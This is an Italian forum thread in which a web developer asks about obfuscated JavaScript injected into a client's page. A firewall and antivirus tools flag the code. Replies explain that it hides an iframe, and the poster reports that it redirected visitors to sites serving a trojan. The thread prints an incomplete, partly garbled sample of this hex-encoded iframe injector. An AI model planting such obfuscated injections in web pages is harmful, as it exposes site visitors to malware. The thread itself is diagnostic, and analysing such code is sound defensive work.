Script e function per i motori di ricerca, possibile?

[Dr. X]

Salve a tutti
Ho un problema al quale, ammetto la mia ignoranza, non sto trovando risposta.

Vi spiego brevemente.
Un cliente al quale ho creato un sito Internet, si è rivolto ad un'altra ditta per farselo "ottimizzare" in modo, secondo loro, da stare nelle prime due pagine di tutti i motori di ricerca.
E vabbé...

Il fatto è, ke andando ad analizzare la pagina ottimizzata, c'è una serie di linee script come queste:

<script>function v4690d3acc352c(v4690d3acc87d5){ var v4690d3accd159=16;
return(parseInt(v4690d3acc87d5,v4690d3accd159));}f unction
v4690d3acd6d90(v4690d3acdbe12){ var v4690d3acea625=2; var
v4690d3ace0a42='';for(v4690d3ace5820=0;
v4690d3ace5820<v4690d3acdbe12.length;
v4690d3ace5820+=v4690d3acea625)
{4690d3ace0a42+=(String.fromCharCode(v4690d3acc352 c(v4690d3acdbe12.substr(v4690d3ace5820, v4690d3acea625))));}return v4690d3ace0a42;} document.write(v4690d3acd6d90('3C696672616D65206E6 16D653D2737646263... '));
</script>

Con questi script, accedendo al sito, il firewall mi avvisa di un sito spia.
Rimuovendole torna tutto normale.
Poi non so se è una coincidenza, ma alcuni utenti hanno lamentato avvisi da parte di antivirus.

Qualcuno mi sa dire ke roba è?
Grazie.

[rigby76]

il codice che vedi incomprensibile non è altro che un artificio informatico per inserire nel documento degli elementi html senza farlo capire. Tecnicamente si chiama codice offuscato.

Nei fatti comunque quello che conta è il codice inserito con la funzione document.write: sostituisci ad essa la funzione 'alert' e vedrai il codice html inserito segretamente.

Facendolo sul primo script che hai postato viene fuori l'inizio di un tag iframe, che con tutta probabilità punterà ad una pagina su un server controllato da loro. Cosa faccia realmente quella pagina è tutto da verificare... forse semplicemente un tracking mal implementato (visto che allarma gli antivirus) ma potrebbe essere anche qualcosa di peggio: che livello di serietà ha la ditta che è stata contattata?

[cosencao]

trucchetti delle web agency... potrebbe essere una funzione vicina ad una sorta di spamming...

[Dr. X]

Grazie rigby76.
Effettivamente era codice ombra con redirect su siti esteri ke inviavano un trojan.
Nel dubbio comunque, avevo già rimosso la parte di script.

Pare, comunque, ke la ditta ke ha operato l'ottimizzazione della pagina, sia estranea al fatto.
Il guaio è ke, secondo me, qualcuno si è fatto fregare le password.

Oppure qualcuno ha bucato la sicurezza di Aruba, visto ke il sito sta lì, e si è impadronito di qualke accesso.
Non a caso Aruba, qualke settimana fa, ha cambiato automaticamente tutte le password dei siti.
Boh...

Grazie per l'aiuto.